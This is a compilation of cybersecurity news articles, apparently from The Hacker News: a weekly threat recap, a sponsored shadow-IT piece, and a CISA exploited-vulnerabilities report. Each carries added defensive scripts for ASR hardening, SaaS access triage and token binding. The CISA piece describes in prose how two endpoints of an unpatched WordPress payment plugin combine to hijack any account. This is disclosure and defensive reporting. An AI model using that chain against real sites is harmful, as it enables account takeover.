    This week’s list includes — CVE-2025-20286 (Cisco Identity Services Engine), CVE-2025-49113 (Roundcube), CVE-2025-5419 (Google Chrome), CVE-2025-21479, CVE-2025-21480, CVE-2025-27038 (Qualcomm), CVE-2025-37093 (HPE StoreOnce), CVE-2025-48866 (ModSecurity WAF), CVE-2025-25022 (IBM QRadar Suite), CVE-2025-22243 (VMware NSX Manager), CVE-2025-24364, CVE-2025-24365 (Vaultwarden), and CVE-2024-53298 (Dell PowerScale OneFS).

    📰 Around the Cyber World

    • SentinelOne Blames Outage on Software Flaw — American cybersecurity company SentinelOne revealed that a massive outage that took place on May 29, 2025, and lasted about seven hours was triggered by a software flaw that caused network routes and DNS resolver rules to be deleted. The outage affected multiple customer-facing services in what the company described as a global service disruption. “During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data,” it said. The root cause of the issue, it added, was a “software flaw in an infrastructure control system that removed critical network routes, causing widespread loss of network connectivity within the SentinelOne platform.”
    • Nigeria Jails 9 Chinese Nationals for Being Part of a Cybercrime Syndicate — The Federal High Court of Nigeria convicted nine Chinese nationals and sentenced them each to a year in prison for their roles in a cybercrime syndicate that allegedly involved training and recruiting young Nigerians to commit online fraud such as romance baiting scams. The individuals were arrested in December 2024 as part of an operation codenamed Eagle Flush, which resulted in the arrest of 599 Nigerians and 193 other foreign nationals, many of them Chinese, on suspicion of being involved in a range of online crimes and frauds. In February 2025, several Chinese and Filipino nationals were arraigned on charges of cyber-terrorism, possession of documents containing false pretense, and identity theft. They are said to be among the 792 cryptocurrency investment and romance fraud suspects arrested in December 2024. China’s ambassador to Nigeria, Yu Dunhai, has proposed sending a working group to Nigeria to work with the country’s law enforcement agencies to dismantle Chinese cybercrime rings engaging in telecom frauds. “I can assure you […] that we have zero tolerance for this kind of crime. The Chinese government has always been committed to countering cybercrime and telecom frauds,” said Dunhai.
    • Bogus Airdrops Target Hashgraph Network Users — The U.S. Federal Bureau of Investigation (FBI) warned that scammers are targeting Hedera Hashgraph network users through the NFT airdrop feature embedded in non-custodial wallets to steal cryptocurrency using free rewards as lures. “The Hedera Hashgraph is the distributed ledger used by Hedera. The airdrop feature was originally created by the Hedera Hashgraph network for marketing purposes; however, cybercriminals can exploit this tactic to collect victim data to steal cryptocurrency,” the FBI said. The agency further noted that cyber criminals may advertise the malicious phishing URLs for fraudulent NFT airdrop rewards tokens on social media or through a third-party website. Alternatively, the threat actors may also send an email with a booby-trapped link that, when clicked, requests the victim to enter their credentials to collect the free tokens. However, this action allows them to gain unauthorized access to the wallets and drain the funds.
    • Threat Actors Use Fake Caching Plugin to Steal WordPress Admin Credentials — Bad actors have been found leveraging a bogus WordPress caching plugin named wp-runtime-cache to harvest admin credentials and exfiltrate them to an external server (“woocommerce-check[.]com”) that masquerades as WooCommerce, an open-source e-commerce plugin for WordPress. While it’s currently not clear how the attackers initially compromised the site, typical methods involve exploitation of known security flaws in plugins and themes, or stolen admin credentials (less likely here, since harvesting those credentials is what the plugin does once it is installed). “As demonstrated here, once an attacker has gained access to a site it can be quite easy to hide their malicious activities,” Sucuri said. “This attack highlights the importance of auditing your site’s plugins and users, and maintaining updated admin passwords.”
    • Chinese Hackers Breached U.S. Telecom Company in Summer 2023 — Chinese hackers broke into the systems of an unnamed U.S. telecommunications company in the summer of 2023 and stayed there for seven months before the breach was discovered, Bloomberg reported. The intrusion has been attributed to Salt Typhoon, which attracted attention late last year for its targeting of U.S. telecom firms. The incident indicates that Chinese attackers penetrated the U.S. communications system earlier than publicly known. China, however, denied the allegations, urging relevant parties to “stop spreading all kinds of disinformation about the so-called Chinese hacking threats.”
    • German Data Protection Watchdog Fines Vodafone — Germany’s Federal Commissioner for Data Protection and Freedom of Information (BfDI) imposed two fines totaling €45 million ($51.4 million) on Vodafone for privacy and security violations. “Due to malicious employees in partner agencies who broker contracts to customers on behalf of Vodafone, there had been fraud cases due to fictitious contracts or contract changes at the expense of customers, among other things,” BfDI said. Of the €45 million penalty, €30 million was imposed for security issues in the authentication process associated with MeinVodafone (“My Vodafone”) and its Vodafone Hotline. “The identified authentication vulnerabilities enabled, among other things, unauthorized third parties to access eSIM profiles,” authorities said. Vodafone has updated its systems to mitigate such risks in the future, the BfDI added.
    • NSO Group Appeals $168 Million Damages to WhatsApp — Spyware vendor NSO Group has appealed a jury’s decision requiring it to pay about $168 million in damages to WhatsApp, saying the award is unlawful. The order was announced last month, more than five years after a lawsuit was filed over NSO Group’s alleged role in facilitating government spying on 1,400 mobile devices belonging to journalists, human rights activists, and political dissidents. According to NSO Group, WhatsApp should not be awarded more than $1.77 million. “The most plausible explanation for the oddly specific amount of the punitive damages award is that the jury chose that amount in an attempt to bankrupt NSO,” the Israeli company’s filing said. “The jury’s award comes close to wiping out all of NSO’s current ‘assets.’”
    • Mozilla Debuts New System to Flag Cryptocurrency Drainer Add-ons — Mozilla said it’s developed an “early detection system” to detect and block scam crypto wallet extensions before they gain popularity among users and are used to steal users’ assets by tricking them into entering their credentials. “The first layer of defense involves automated indicators that determine a risk profile for wallet extensions submitted to AMO [addons.mozilla.org],” Mozilla said. “If a wallet extension reaches a certain risk threshold, human reviewers are alerted to take a deeper look. If found to be malicious, the scam extensions are blocked immediately.”
    • iPhone Zero-Click Campaign Targets Users in Europe and the U.S. — Mobile research company iVerify revealed that it found evidence of anomalous activity on iPhones belonging to individuals affiliated with political campaigns, media organizations, A.I. companies, and governments operating in the European Union and the United States. It said it detected “exceedingly rare crashes” that are traditionally associated with sophisticated zero-click attacks via iMessage using a previously undocumented vulnerability in the “imagent” process to carry out post-exploitation actions. The vulnerability has been codenamed NICKNAME. The issue, observed in iOS versions up to 18.1.1, was patched in version 18.3.1 released in January 2025. “The bug involves a race condition in how iOS processes ‘Nickname Updates,’ the feature that allows users to share personalized contact information with their iMessage contacts,” iVerify said. It’s said that the shortcoming was exploited in targeted attacks as recently as March 2025, prompting Apple to send a threat notification to at least one device belonging to a senior government official in the E.U. on which the crash was observed. In total, six devices are believed to have been targeted by the unknown threat actor, two of which exhibited “clear signs of successful exploitation.” What makes the activity notable is that all the identified victims were previously targeted by the China-linked Salt Typhoon hacking group. In a statement shared with Axios, Apple acknowledged the fix, but disputed that it was ever used in a malicious context. It described it as a “conventional software bug that we identified and fixed in iOS 18.3” and said that “iVerify has not responded with meaningful technical evidence supporting their claims, and we are not currently aware of any credible indication that the bug points to an exploitation attempt or active attack.”
    • South Korea Targeted by ViperSoftX to Steal Crypto — Threat hunters have disclosed a new malware campaign that employs cracked software or key generators for legitimate software as lures to distribute a known stealer malware called ViperSoftX, alongside other malware families such as Quasar RAT, PureCrypter, PureHVNC, and a cryptocurrency clipper. “The ViperSoftX threat actor installs various PowerShell scripts in infected systems and uses them to download additional payloads,” AhnLab said. “This allows them to receive commands from the threat actor and perform various malicious behaviors.”
    • U.S. State Department Offers $10M for Info About RedLine Developers — The U.S. State Department has announced rewards of up to $10 million for information on individuals affiliated with the RedLine information stealer, which suffered a law enforcement crackdown in October 2024. This could include foreign government-linked associates of Maxim Alexandrovich Rudometov, or their malicious cyber activities, or foreign government-linked use of the stealer. Rudometov was charged by the U.S. Justice Department last year for his alleged role as the developer and for marketing the malware-as-a-service (MaaS) on underground forums such as Russian Market, which has emerged as one of the most popular platforms for buying and selling credentials stolen by information stealer malware. Also known by the aliases “dendimirror,” “alinchok,” “ghackihg,” “makc1901,” “navi_ghacking,” and “bloodzz.fenix,” Rudometov is believed to have fled from the Luhansk region of Ukraine, where he was born, to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022. The development comes weeks after the disruption of another notorious information stealer named Lumma last month by law enforcement and private-sector companies. According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed. “In Q1 2025, Acreed surpassed every established infostealer in terms of Russian Market alert attribution, ranking second only to giant Lumma,” the company said. “Since the law enforcement takedown of Lumma in mid-May 2025, Acreed is perfectly positioned to rapidly gain traction as cybercriminals seek alternatives.”
    • Apple Allegedly Gave Governments Data on 1000s of Push Notifications — Apple provided governments around the world with data related to thousands of push notifications sent to its devices, according to a report published by 404 Media. The data for the first time puts a concrete figure on how many requests governments around the world are making for push notification data from Apple (and Google). The practice first came to light in late 2023 when Senator Ron Wyden sent a letter to the U.S. Department of Justice, demanding more transparency into the practice. “The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered,” the letter read. “In certain instances, they also might receive unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in an app notification.”
    • China Accuses Taiwan of Running 5 APT Groups with U.S. Help — China’s National Computer Virus Emergency Response Center (CVERC) has accused Taiwan’s Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland China. “Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad,” CVERC claimed in a report titled Operation Futile. “They even attempt to disrupt social order and create chaos.” The groups, allegedly overseen by Taiwan’s Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa). It also claimed that APT-C-67’s campaigns are geared towards collecting geographic intelligence, while stating APT-C-01 has “close ties” with the U.S. Cyber Command and that it focuses on “hunt forward” operations. The report coincided with China issuing warrants for 20 Taiwanese people that it said carried out hacking missions in the Chinese mainland on behalf of the island’s ruling party.
    • Colombian Cyber Criminals Linked to Vehicle Insurance Scams — Cybercriminals from Colombia have been attributed to a scam that involves creating a network of over 100 fake websites to deceive users seeking damage-precautionary and mandatory vehicle insurance. The intent is to lend the sites a veneer of legitimacy, exploit users’ trust, and convince them to make payments to “activate” their insurance. The scheme employs ads on Facebook, urging users to engage with the threat actors on WhatsApp. “The scammers redirect them to a fake website posing as a legitimate car insurance provider,” Group-IB said. “The site nudges users to enter their vehicle registration number, initiating a process that feels remarkably authentic. The scam’s effectiveness lies in validating the vehicle’s insurance status. The site denies the purchase if the insurance is still active, reinforcing its credibility as a legitimate service. However, if the insurance has expired, the site displays accurate vehicle details, making it almost impossible for users to suspect foul play.” It’s believed that the threat actors extract the vehicle status from public databases and government sites.
    • German Authorities Dox Leader of TrickBot — Germany’s Federal Criminal Police Office (aka Bundeskriminalamt or BKA) has outed Russian national Vitaly Nikolaevich Kovalev as the founder and leader of the TrickBot (aka Wizard Spider) cybercrime gang. Kovalev was recently added to the E.U. Most Wanted list in connection with a law enforcement operation that led to the takedown of about 300 servers worldwide and the neutralization of 650 domains last month. The development comes as a mysterious leaker calling themselves GangExposed revealed the key figures behind the Conti and TrickBot crews, including Conti’s lead negotiator Arkady Valentinovich Bondarenko. In a statement to The Register, the leaker said the actions are part of their “fight against an organized society of criminals known worldwide.”

    🎥 Cybersecurity Webinars

    • Hackers Are Hiding in Trusted Sites — Learn to Spot LOTS Attacks: Hackers aren’t breaking in—they’re blending in. In this live webinar, Zscaler’s top threat hunters will show how attackers are hiding inside trusted sites and tools to stay invisible. You’ll hear real stories from the front lines, learn what threats are trending right now, and get clear, practical tips to spot and stop stealth attacks before they spread. If you care about catching what your security tools are missing, don’t miss this.
    • Every AI Agent Has a Secret Identity — Learn How to Find It Before Attackers Do: AI agents are reshaping how businesses operate—but behind every agent is a hidden identity risk. From service accounts to API keys, these Non-Human Identities (NHIs) have deep access yet often go unmanaged and unmonitored. In this webinar, you’ll uncover how attackers are targeting these invisible identities and learn practical steps to secure them before they become your biggest blind spot.

    🔧 Cybersecurity Tools

    • InterceptSuite: A tool that intercepts and inspects encrypted traffic from any app—not just web browsers. Built for deep visibility into TLS traffic across protocols, it gives security pros the power to analyze what traditional HTTP-only tools can’t see.
    • Malware Detection System: A multi-layered system that detects malicious websites using static analysis, dynamic behavior monitoring, and threat intelligence APIs. It flags threats like phishing, malware, obfuscated scripts, and hidden content for real-time, accurate detection.

    Disclaimer: These newly released tools are for educational use only and haven’t been fully audited. Use at your own risk—review the code, test safely, and apply proper safeguards.

    🔒 Tip of the Week

    Block Malware Tactics Before They Start — Turn On ASR Rules → Much modern malware never drops a recognizable malicious executable; it abuses trusted tools like Word, Excel, and PowerShell to run silently in the background. Microsoft Defender’s built-in Attack Surface Reduction (ASR) rules stop these attacks by blocking dangerous actions like Office macros launching scripts or unknown apps reaching into sensitive parts of the system.

    Here’s how you can enable ASR protection in minutes:

    Home & Power Users: Download ConfigureDefender, a free, open-source third-party utility (not a Microsoft product) that lets you enable the key ASR rules with a few clicks. Review what it changes before trusting any third-party tool with your security settings, then open the app, choose the “High” or “Max” profile, and click “Apply Settings”. Your system will now block many common malware techniques.

    Advanced Users or IT Admins: From an elevated PowerShell prompt, use this command to enable a critical ASR rule:

    Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

    This one blocks Office apps from launching child processes—a common trick in ransomware delivery.

    ASR rules don’t just block known malware; they shut down entire categories of risky behavior. They’re free, lightweight, and already built into Windows 10/11 Pro and Enterprise, provided Microsoft Defender Antivirus is the active antivirus. In a managed fleet, roll a new rule out with -AttackSurfaceReductionRules_Actions AuditMode first, review what it would have blocked, and only then switch it to Enabled. Turning them on can prevent threats your antivirus may never catch.
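    The procedure above enables a single rule. The script below is an added example, not from The Hacker News or Microsoft: it rolls out a baseline of several ASR rules in AuditMode, reports each rule’s configured state from Get-MpPreference, and pulls the Defender event log entries (1121 for blocks, 1122 for audit hits) that tell you what the rules would have stopped. The rule GUIDs are Microsoft’s published identifiers; which rules make up the baseline is this example’s own choice. It assumes Windows 10/11 Pro or Enterprise, Microsoft Defender Antivirus as the active AV, and an elevated PowerShell session.

```powershell
# Added example: roll out a baseline of Defender ASR rules in AuditMode, then report state and hits.
# Requires Windows 10/11 Pro or Enterprise, Microsoft Defender Antivirus active, elevated PowerShell.
# Rule GUIDs are Microsoft's published identifiers; the selection is this example's own baseline.

$AsrBaseline = [ordered]@{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 API calls from Office macros'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    '9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2' = 'Block credential stealing from LSASS'
    'E6DB77E5-3DF2-4CF1-B95A-636979351E5B' = 'Block persistence through WMI event subscription'
    'C1DB55AB-C21A-4637-BB3F-A12568109D35' = 'Use advanced protection against ransomware'
}

# Numeric action values as Get-MpPreference reports them.
$AsrActionName = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'AuditMode'; 6 = 'Warn' }

function Set-AsrBaseline {
    # Add-MpPreference merges with rules already configured (Set-MpPreference would replace them).
    # Ids and Actions are parallel arrays, so one action is replicated per rule id.
    param([ValidateSet('AuditMode', 'Enabled', 'Warn', 'Disabled')][string]$Action = 'AuditMode')
    $ids = @($AsrBaseline.Keys)
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ids `
                     -AttackSurfaceReductionRules_Actions (@($Action) * $ids.Count)
}

function Get-AsrBaselineStatus {
    # One row per baseline rule with its configured state, or NotConfigured.
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    $configured = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $configured[$ids[$i].ToUpper()] = [int]$acts[$i] }
    foreach ($id in $AsrBaseline.Keys) {
        $state = if ($configured.ContainsKey($id)) { $AsrActionName[$configured[$id]] } else { 'NotConfigured' }
        [pscustomobject]@{ Rule = $AsrBaseline[$id]; Id = $id; State = $state }
    }
}

function Get-AsrEvents {
    # Defender logs event 1121 when a rule blocks and 1122 when a rule in AuditMode would have blocked.
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

Set-AsrBaseline -Action AuditMode    # observe first; rerun with -Action Enabled once the 1122 events look clean
Get-AsrBaselineStatus | Format-Table -AutoSize
Get-AsrEvents -Days 7  | Format-Table -AutoSize -Wrap
```

    The audit-first order matters: a rule like “Block execution of potentially obfuscated scripts” can fire on legitimate admin tooling, and the 1122 events collected over a week are what you use to add exclusions or drop a rule before anything is actually blocked.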

    Conclusion

    This week’s takeaways are a reminder: threats rarely knock—they slip in. Every missed patch, strange behavior, or failed control is a step closer to something worse. If anything here hits close to home, don’t delay the fix. The next breach is often just a mistake left unchecked.



    Source: thehackernews.com…

  • Think Your IdP or CASB Covers Shadow IT? These 5 Risks Prove Otherwise

    Jun 09, 2025 | The Hacker News

    You don’t need a rogue employee to suffer a breach.

    All it takes is a free trial that someone forgot to cancel. An AI-powered note-taker quietly syncing with your Google Drive. A personal Gmail account tied to a business-critical tool. That’s shadow IT. And today, it’s not just about unsanctioned apps, but also dormant accounts, unmanaged identities, over-permissioned SaaS tools, and orphaned access. Most of it slips past even the most mature security solutions.

    Think your CASB or IdP covers this? It doesn’t.

    They weren’t built to catch what’s happening inside SaaS: OAuth sprawl, shadow admins, GenAI access, or apps created directly in platforms like Google Workspace or Slack. Shadow IT is no longer a visibility issue – it’s a full-blown attack surface.

    Wing Security helps security teams uncover these risks before they become incidents.

    Here are 5 real-world examples of shadow IT that could be quietly bleeding your data.

    1. Dormant access you can’t see, that attackers love to exploit

    • The risk: Employees sign up for tools using just a username and password, without SSO or centralized visibility. Over time, they stop using the apps, but access stays, and worse, it is unmanaged.
    • The impact: These zombie accounts become invisible entry points into your environment. You can’t enforce MFA, monitor usage, or revoke access during offboarding.
    • Example: CISA and global cyber agencies issued a joint advisory warning in 2024 that Russian state-sponsored group APT29 (part of the SVR) actively targets dormant accounts to gain access to enterprise and government systems. These accounts often serve as ideal footholds since they go unnoticed, lack MFA, and remain accessible long after they’re no longer in use.

    2. Generative AI quietly reading your emails, files, and strategy

    • The risk: SaaS apps powered by Generative AI usually request broad OAuth permissions with full access to read inboxes, files, calendars, and chats.
    • The impact: These apps are often granted far more access than they need and can move sensitive data to third parties with unclear data retention and model training policies. Once access is granted, there’s no way to monitor how your data is stored, who has access to it internally, or what happens if the vendor is breached or misconfigures access.
    • Example: In early 2025, a publicly exposed DeepSeek database was found leaking chat histories, API keys, and backend details, highlighting the risk of giving third-party GenAI tools broad access without oversight of their data security.

    3. Former employees still hold admin access, months after leaving

    • The risk: When employees onboard new SaaS tools (especially outside your IdP), they often are the sole admin. Even after they leave the company, their access remains.
    • The impact: These accounts can have persistent, privileged access to company tools, files, or environments, posing a long-term insider risk.
    • Real-life example: A contractor set up a time-tracking app and linked it to the company’s HR system. Months after their contract ended, they still had admin access to employee logs.

    See what Wing uncovers in your SaaS environment. Talk with a security expert and get a demo.

    4. Business-critical apps tied to personal accounts you don’t control

    • The risk: Employees sometimes use their personal Gmail, Apple ID, or other unmanaged accounts to sign up for business apps like Figma, Notion, or even Google Drive.
    • The impact: These accounts exist entirely outside of IT visibility. If they get compromised, you can’t revoke access or enforce security policies.
    • Example: In the 2023 Okta customer support breach, attackers used a service account without MFA that had access to Okta’s support system; its credentials had been saved in an employee’s personal Google account on a company laptop. The account was active, unmonitored, and not tied to a specific person. Even companies with mature identity systems can miss these blind spots.

    5. Shadow SaaS with app-to-app connectivity to your crown jewels

    • The risk: Employees connect unsanctioned SaaS apps directly to trusted platforms like Google Workspace, Salesforce, or Slack—without IT involvement or review. These app-to-app connections often request broad API access and stay active long after use.
    • The impact: These integrations create hidden pathways into critical systems. If compromised, they can enable lateral movement, allowing attackers to pivot across apps, exfiltrate data, or maintain persistence without triggering traditional alerts.
    • Example: A product manager connected a roadmap tool to Jira and Google Drive. The integration requested broad access but was forgotten after the project ended. When the vendor was later breached, attackers used the lingering connection to pull files from Drive and pivot into Jira, accessing internal credentials and escalation paths. This type of lateral movement was seen in the 2024 Microsoft breach by Midnight Blizzard, where attackers leveraged a legacy OAuth app with mailbox access to evade detection and maintain persistent access to internal systems.
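
    The five risks above come down to questions a SaaS inventory export can answer: which grants carry broad scopes, which admins have left, which owners are unmanaged identities, and which app-to-app integrations have gone stale. The following is an added example and not code from the original article or from Wing’s product; the scope names, the corporate domain, the 90-day staleness threshold and the inventory rows are all constructed for illustration, and a real run would read the same fields from an IdP or SaaS security export.

```python
"""Triage a constructed SaaS/OAuth grant inventory for the shadow-IT risks
described above. Scope strings, domains and rows are made up for the example."""
from dataclasses import dataclass, field
from datetime import date
from typing import Dict, List, Set

# Scopes treated as "broad": full read/write over mail, files, calendar or chat.
# These are assumed names, not any vendor's real scope identifiers.
BROAD_SCOPES = {"mail.readwrite", "drive.full", "calendar.readwrite", "chat.read"}
CORPORATE_DOMAINS = {"example.com"}   # assumed corporate identity domain
STALE_AFTER_DAYS = 90                 # assumed threshold for a "forgotten" integration


@dataclass
class SaasGrant:
    app: str
    owner: str                 # account that installed / administers the app
    owner_role: str            # "admin" or "member" inside the app
    owner_active: bool         # still employed according to HR / the IdP
    managed_by_idp: bool       # app is federated through the corporate IdP
    last_used: date
    scopes: Set[str] = field(default_factory=set)
    connected_to: List[str] = field(default_factory=list)  # app-to-app links


def owner_domain(email: str) -> str:
    return email.rsplit("@", 1)[-1].lower()


def triage(grant: SaasGrant, today: date) -> List[str]:
    """Return the risk tags that apply to one grant (empty list if clean)."""
    findings = []
    # Risk 2: app holding full inbox / files / calendar / chat access
    if grant.scopes & BROAD_SCOPES:
        findings.append("broad_scopes")
    # Risk 3: the admin has left, but the account and its access remain
    if grant.owner_role == "admin" and not grant.owner_active:
        findings.append("orphaned_admin")
    # Risk 4: business app tied to a personal or otherwise unmanaged identity
    if not grant.managed_by_idp or owner_domain(grant.owner) not in CORPORATE_DOMAINS:
        findings.append("unmanaged_identity")
    # Risk 5: integration into a trusted platform that nobody has used for months
    if grant.connected_to and (today - grant.last_used).days > STALE_AFTER_DAYS:
        findings.append("stale_integration")
    return findings


def triage_inventory(grants: List[SaasGrant], today: date) -> Dict[str, List[str]]:
    """Map app name -> findings, keeping only grants with at least one finding."""
    report = {}
    for grant in grants:
        tags = triage(grant, today)
        if tags:
            report[grant.app] = tags
    return report


# Constructed inventory mirroring the scenarios in the article.
TODAY = date(2025, 6, 1)
SAMPLE_GRANTS = [
    SaasGrant("ai-meeting-notes", "alice@example.com", "member", True, True,
              date(2025, 5, 30), scopes={"mail.readwrite", "calendar.readwrite"}),
    SaasGrant("time-tracker", "contractor@example.com", "admin", False, False,
              date(2025, 5, 20), connected_to=["hr-system"]),
    SaasGrant("design-board", "bob.personal@gmail.example", "admin", True, False,
              date(2025, 5, 29), scopes={"profile"}),
    SaasGrant("roadmap-tool", "pm@example.com", "admin", True, True,
              date(2024, 11, 1), scopes={"drive.full"},
              connected_to=["jira", "google-drive"]),
    SaasGrant("expense-app", "carol@example.com", "member", True, True,
              date(2025, 5, 31), scopes={"profile"}),
]

if __name__ == "__main__":
    for app, tags in triage_inventory(SAMPLE_GRANTS, TODAY).items():
        print(f"{app:18} {', '.join(tags)}")
```

    The useful output is the intersection: a grant that is both an orphaned admin and an unmanaged identity, or both broad-scoped and stale, is the one to revoke first, because nobody inside the company can currently see or control it.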

    What are you doing about it?

    Shadow IT isn’t just a governance problem—it’s a real security gap. And the longer it goes unnoticed, the bigger the risk and the more exposed your SaaS environment becomes.

    Wing Security automatically discovers SaaS apps, users, and integrations—mapping human and non-human identities, permissions, and MFA status—without agents or proxies. Once the unknown becomes known, Wing delivers multi-layered SaaS security in one platform, unifying misconfigurations, identity threats, and SaaS risks into a single source of truth. By correlating events across apps and identities, Wing cuts through the noise, prioritizes what matters, and enables proactive, continuous security.

    👉 Get a demo and take control of your SaaS environment – before hackers do.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • CISA Adds Erlang SSH and Roundcube Flaws to Known Exploited Vulnerabilities Catalog

    Jun 10, 2025 | Ravie Lakshmanan | Vulnerability / Cyber Attacks


    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two critical security flaws impacting Erlang/Open Telecom Platform (OTP) SSH and Roundcube to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

    The vulnerabilities in question are listed below –

    • CVE-2025-32433 (CVSS score: 10.0) – A missing authentication for a critical function vulnerability in the Erlang/OTP SSH server that could allow an attacker to execute arbitrary commands without valid credentials, potentially leading to unauthenticated remote code execution. (Fixed in April 2025 in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20)
    • CVE-2024-42009 (CVSS score: 9.3) – A cross-site scripting (XSS) vulnerability in Roundcube Webmail that could allow a remote attacker to steal and send a victim’s emails via a crafted email message, by taking advantage of a desanitization issue in program/actions/mail/show.php. (Fixed in August 2024 in versions 1.6.8 and 1.5.8)

    There are currently no details on how the two vulnerabilities are exploited in the wild, and by whom. Last month, ESET revealed that the Russia-linked threat actor known as APT28 exploited several XSS flaws in Roundcube, Horde, MDaemon, and Zimbra to target governmental entities and defense companies in Eastern Europe. It’s not clear if the abuse of CVE-2024-42009 is related to this activity or something else.

    According to data from Censys, there are 340 exposed Erlang servers, although it bears noting that not all instances are necessarily susceptible to the flaw. The public disclosure of CVE-2025-32433 has been quickly followed by the release of several proof-of-concept (PoC) exploits for it.

    In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by June 30, 2025, for optimal protection.

    The development comes as Patchstack flagged an unpatched account takeover vulnerability in the PayU CommercePro plugin for WordPress (CVE-2025-31022, CVSS score: 9.8) that enables an attacker to seize control of any user account on a site without any authentication.

    This can have serious consequences when the attacker is able to hijack an administrator account, permitting them to take over the site and perform malicious actions. The vulnerability affects versions 3.8.5 and earlier. The plugin has over 5,000 active installations.

    The problem has to do with a function called “update_cart_data(),” which is invoked from an endpoint named “/payu/v1/get-shipping-cost” that checks whether a provided email address exists and, if so, processes the e-commerce order for checkout.


    But the endpoint only checks for a valid token linked to a hard-coded email address (“commerce.pro@payu[.]in”), and a second REST API (“/payu/v1/generate-user-token”) generates an authentication token for any given email. An attacker could combine the two to obtain the token corresponding to “commerce.pro@payu[.]in” and then send a request to “/payu/v1/get-shipping-cost” to hijack any account.

    Users are advised to deactivate and delete the plugin until a patch for the vulnerability is made available.

    “It is necessary to ensure that the unauthenticated REST API endpoints are not overly permissive and provide more access to the users,” Patchstack said. “Also, hard-coding sensitive or dynamic information such as email addresses to use it for other cases inside the codebase is not recommended.”
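
    Patchstack’s two recommendations map onto two design rules: a token-issuing endpoint must only mint tokens for the identity the caller has already authenticated as, and a protected endpoint must authorize on the token’s subject matching the account being acted on, never on a single hard-coded identity. The following is an added illustration of those rules, written in Python rather than the plugin’s PHP; it is not the PayU plugin’s code, and the signing key, account store, `session_user` parameter and endpoint-style function names are constructed for the example.

```python
"""Bind API tokens to the identity that requested them, and authorize each
request against the token's subject. Constructed example; not the plugin's code."""
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, Optional

SIGNING_KEY = secrets.token_bytes(32)   # constructed; load from configuration in practice

# Constructed account store: email -> profile the checkout endpoint acts on.
ACCOUNTS: Dict[str, dict] = {
    "alice@example.com": {"address": "1 Main St"},
    "bob@example.com": {"address": "2 High St"},
}


def issue_token(email: str, ttl_seconds: int = 3600) -> str:
    """HMAC-signed token whose payload names its subject and expiry."""
    payload = json.dumps({"sub": email, "exp": int(time.time()) + ttl_seconds},
                         separators=(",", ":"), sort_keys=True).encode()
    sig = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
    return payload.hex() + "." + sig


def verify_token(token: str) -> Optional[dict]:
    """Return the claims if the signature is valid and unexpired, else None."""
    try:
        payload_hex, sig = token.split(".", 1)
        payload = bytes.fromhex(payload_hex)
    except ValueError:
        return None
    expected = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None
    claims = json.loads(payload)
    if claims.get("exp", 0) < time.time():
        return None
    return claims


# Rule 1: only mint a token for the identity the caller already proved.
# `session_user` stands in for whatever the framework's login session provides
# (an assumption for this example); None means the request is unauthenticated.
def generate_user_token(session_user: Optional[str], requested_email: str) -> Optional[str]:
    if session_user is None or session_user.lower() != requested_email.lower():
        return None            # not logged in, or asking for someone else's token
    return issue_token(session_user.lower())


# Rule 2: the protected endpoint checks that the token's subject is the account
# being acted on. Comparing the subject against one fixed address instead would
# let any holder of that single token operate on every account.
def get_shipping_cost(token: str, email: str) -> Optional[dict]:
    claims = verify_token(token)
    if claims is None or claims["sub"] != email.lower():
        return None            # token does not belong to this account
    profile = ACCOUNTS.get(email.lower())
    if profile is None:
        return None
    return {"email": email.lower(), "ship_to": profile["address"]}


if __name__ == "__main__":
    tok = generate_user_token("alice@example.com", "alice@example.com")
    print(get_shipping_cost(tok, "alice@example.com"))   # Alice's own data
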